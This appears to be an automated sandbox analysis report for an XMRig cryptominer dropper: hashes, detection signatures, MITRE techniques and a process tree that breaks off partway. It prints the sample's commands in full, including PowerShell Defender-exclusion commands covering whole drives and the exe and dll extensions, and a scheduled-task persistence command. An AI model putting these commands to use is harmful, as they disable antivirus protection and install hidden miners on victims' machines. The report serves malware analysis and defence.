xmrig | f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871

Analysis

max time kernel
117s
max time network
111s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
23-11-2024 12:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe
Size

15.4MB
MD5

c2a14e873d47a54010d29d3208050f98
SHA1

115a5076ff926500ae220cf5e3730084f8a5acf5
SHA256

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871
SHA512

a3a6015a5f4971b24ef51ebbd169c36afa16ebcce6ae0cc34493ad7a9cf01478728a839198fa9b364aed2ae5cb061bff013d02cb48372aed2669c8067bdb3fd3
SSDEEP

393216:kiFsmlTVA8M17MtdipJPVRHy5CKNidWk6KODEfQ:kiHjjJtspN686TuQ

Score

10^/10

xmrig agilenet discovery evasion execution miner themida trojan vmprotect

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

launcher.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ launcher.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	launcher.exe

XMRig Miner payload 17 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2364-137-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-141-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-153-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-157-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-156-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-166-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-165-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-164-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-163-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-162-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-171-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-151-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-149-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-147-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-145-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-143-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2364-139-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1340	powershell.exe
1544	powershell.exe
2932	powershell.exe
2092	powershell.exe
2760	powershell.exe
1440	powershell.exe
304	powershell.exe
2284	powershell.exe
2712	powershell.exe
2068	powershell.exe
568	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

launcher.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	launcher.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	launcher.exe

Drops startup file 1 IoCs

Processes:

RuntimeBroker.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk RuntimeBroker.exe
Executes dropped EXE 9 IoCs

Processes:

RuntimeBroker.exeConsole.exeJava.exelauncher.exeservices64.exeservices32.exesihost32.exesihost64.exe

pid process

2612 RuntimeBroker.exe
2696 Console.exe
2556 Java.exe
2636 launcher.exe
1204
2740 services64.exe
2992 services32.exe
2588 sihost32.exe
2376 sihost64.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk	RuntimeBroker.exe

pid	process
2612	RuntimeBroker.exe
2696	Console.exe
2556	Java.exe
2636	launcher.exe
1204
2740	services64.exe
2992	services32.exe
2588	sihost32.exe
2376	sihost64.exe

Loads dropped DLL 15 IoCs

Processes:

cmd.execmd.execmd.exelauncher.exeWerFault.execmd.execmd.execonhost.execonhost.exe

pid	process
2768	cmd.exe
2820	cmd.exe
2684	cmd.exe
2636	launcher.exe
1624	WerFault.exe
1624	WerFault.exe
1624	WerFault.exe
1624	WerFault.exe
1624	WerFault.exe
1624	WerFault.exe
1624	WerFault.exe
2348	cmd.exe
1880	cmd.exe
2700	conhost.exe
2304	conhost.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\launcher.exe	agile_net
behavioral1/memory/2636-33-0x00000000008A0000-0x0000000000EBA000-memory.dmp	agile_net

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\84d8043e-3701-4cd3-aaf7-74eac22b6538\AgileDotNetRT64.dll	themida
behavioral1/memory/2636-40-0x000007FEF2600000-0x000007FEF2E6C000-memory.dmp	themida
behavioral1/memory/2636-41-0x000007FEF2600000-0x000007FEF2E6C000-memory.dmp	themida
behavioral1/memory/2636-50-0x000007FEF2600000-0x000007FEF2E6C000-memory.dmp	themida
behavioral1/memory/2636-89-0x000007FEF2600000-0x000007FEF2E6C000-memory.dmp	themida

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/memory/2272-7-0x0000000000400000-0x0000000002107000-memory.dmp	vmprotect

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

launcher.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA launcher.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	launcher.exe

Drops file in System32 directory 15 IoCs

Processes:

conhost.exepowershell.execonhost.execonhost.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\services32.exe	conhost.exe
File opened for modification	C:\Windows\system32\services32.exe	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

launcher.exe

pid process

2636 launcher.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 2304 set thread context of 2364 2304 conhost.exe conhost.exe
Drops file in Windows directory 1 IoCs

Processes:

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe

description ioc process

File created C:\Windows\RuntimeBroker.exe f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe

pid	process
2636	launcher.exe

description	pid	process	target process
PID 2304 set thread context of 2364	2304	conhost.exe	conhost.exe

description	ioc	process
File created	C:\Windows\RuntimeBroker.exe	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.execmd.exepowershell.exepowershell.exepowershell.execmd.execmd.execmd.execmd.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2412 schtasks.exe
956 schtasks.exe

pid	process
2412	schtasks.exe
956	schtasks.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

Processes:

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.execonhost.exe

pid	process
2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe
568	powershell.exe
2760	powershell.exe
1440	powershell.exe
1960	conhost.exe
1568	conhost.exe
2284	powershell.exe
304	powershell.exe
1340	powershell.exe
1544	powershell.exe
2304	conhost.exe
2304	conhost.exe
2712	powershell.exe
2700	conhost.exe
2700	conhost.exe
2932	powershell.exe
2068	powershell.exe
2092	powershell.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe
2364	conhost.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

RuntimeBroker.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exe

description	pid	process
Token: 35	2612	RuntimeBroker.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	1960	conhost.exe
Token: SeDebugPrivilege	1568	conhost.exe
Token: SeDebugPrivilege	304	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	2304	conhost.exe
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	2700	conhost.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeLockMemoryPrivilege	2364	conhost.exe
Token: SeLockMemoryPrivilege	2364	conhost.exe
Token: SeDebugPrivilege	2092	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.execmd.execmd.execmd.execmd.execmd.execmd.exelauncher.exeConsole.exeJava.execonhost.exe

description	pid	process	target process
PID 2272 wrote to memory of 2800	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2800	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2800	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2800	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2804	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2804	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2804	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2804	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2820	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2820	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2820	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2820	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2788	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2788	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2788	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2788	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2684	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2684	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2684	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2684	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2768	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2768	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2768	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2272 wrote to memory of 2768	2272	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 2804 wrote to memory of 2760	2804	cmd.exe	powershell.exe
PID 2804 wrote to memory of 2760	2804	cmd.exe	powershell.exe
PID 2804 wrote to memory of 2760	2804	cmd.exe	powershell.exe
PID 2804 wrote to memory of 2760	2804	cmd.exe	powershell.exe
PID 2800 wrote to memory of 568	2800	cmd.exe	powershell.exe
PID 2800 wrote to memory of 568	2800	cmd.exe	powershell.exe
PID 2800 wrote to memory of 568	2800	cmd.exe	powershell.exe
PID 2800 wrote to memory of 568	2800	cmd.exe	powershell.exe
PID 2768 wrote to memory of 2696	2768	cmd.exe	Console.exe
PID 2768 wrote to memory of 2696	2768	cmd.exe	Console.exe
PID 2768 wrote to memory of 2696	2768	cmd.exe	Console.exe
PID 2768 wrote to memory of 2696	2768	cmd.exe	Console.exe
PID 2788 wrote to memory of 2612	2788	cmd.exe	RuntimeBroker.exe
PID 2788 wrote to memory of 2612	2788	cmd.exe	RuntimeBroker.exe
PID 2788 wrote to memory of 2612	2788	cmd.exe	RuntimeBroker.exe
PID 2788 wrote to memory of 2612	2788	cmd.exe	RuntimeBroker.exe
PID 2820 wrote to memory of 2556	2820	cmd.exe	Java.exe
PID 2820 wrote to memory of 2556	2820	cmd.exe	Java.exe
PID 2820 wrote to memory of 2556	2820	cmd.exe	Java.exe
PID 2820 wrote to memory of 2556	2820	cmd.exe	Java.exe
PID 2684 wrote to memory of 2636	2684	cmd.exe	launcher.exe
PID 2684 wrote to memory of 2636	2684	cmd.exe	launcher.exe
PID 2684 wrote to memory of 2636	2684	cmd.exe	launcher.exe
PID 2684 wrote to memory of 2636	2684	cmd.exe	launcher.exe
PID 2804 wrote to memory of 1440	2804	cmd.exe	powershell.exe
PID 2804 wrote to memory of 1440	2804	cmd.exe	powershell.exe
PID 2804 wrote to memory of 1440	2804	cmd.exe	powershell.exe
PID 2804 wrote to memory of 1440	2804	cmd.exe	powershell.exe
PID 2636 wrote to memory of 1624	2636	launcher.exe	WerFault.exe
PID 2636 wrote to memory of 1624	2636	launcher.exe	WerFault.exe
PID 2636 wrote to memory of 1624	2636	launcher.exe	WerFault.exe
PID 2696 wrote to memory of 1568	2696	Console.exe	conhost.exe
PID 2696 wrote to memory of 1568	2696	Console.exe	conhost.exe
PID 2696 wrote to memory of 1568	2696	Console.exe	conhost.exe
PID 2696 wrote to memory of 1568	2696	Console.exe	conhost.exe
PID 2556 wrote to memory of 1960	2556	Java.exe	conhost.exe
PID 2556 wrote to memory of 1960	2556	Java.exe	conhost.exe
PID 2556 wrote to memory of 1960	2556	Java.exe	conhost.exe
PID 2556 wrote to memory of 1960	2556	Java.exe	conhost.exe
PID 1960 wrote to memory of 2816	1960	conhost.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe
"C:\Users\Admin\AppData\Local\Temp\f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('The operating system is not supported by this application','Error','OK','Error')"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('The operating system is not supported by this application','Error','OK','Error')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\Java.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Users\Admin\AppData\Local\Temp\Java.exe
    C:\Users\Admin\AppData\Local\Temp\Java.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Java.exe"
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1960
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        5⤵
        
        PID:2816
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:304
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1544
    - - C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
        5⤵
        
        PID:884
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2412
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Windows\system32\services32.exe"
        5⤵
        Loads dropped DLL
        
        PID:1880
      - C:\Windows\system32\services32.exe
        
        C:\Windows\system32\services32.exe
        6⤵
        Executes dropped EXE
        
        PID:2992
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
        7⤵
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        8⤵
        
        PID:1976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
        
        C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        
        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        8⤵
        Executes dropped EXE
        
        PID:2588
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost32"
        9⤵
        
        PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Windows\RuntimeBroker.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2788
- - C:\Windows\RuntimeBroker.exe
    C:\Windows\RuntimeBroker.exe
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\launcher.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Users\Admin\AppData\Local\Temp\launcher.exe
    C:\Users\Admin\AppData\Local\Temp\launcher.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2636 -s 616
      4⤵
      Loads dropped DLL
      PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\Console.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Users\Admin\AppData\Local\Temp\Console.exe
    C:\Users\Admin\AppData\Local\Temp\Console.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Console.exe"
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1568
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        5⤵
        
        PID:2132
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        6⤵
        Command and Scripting Interpreter: PowerShell
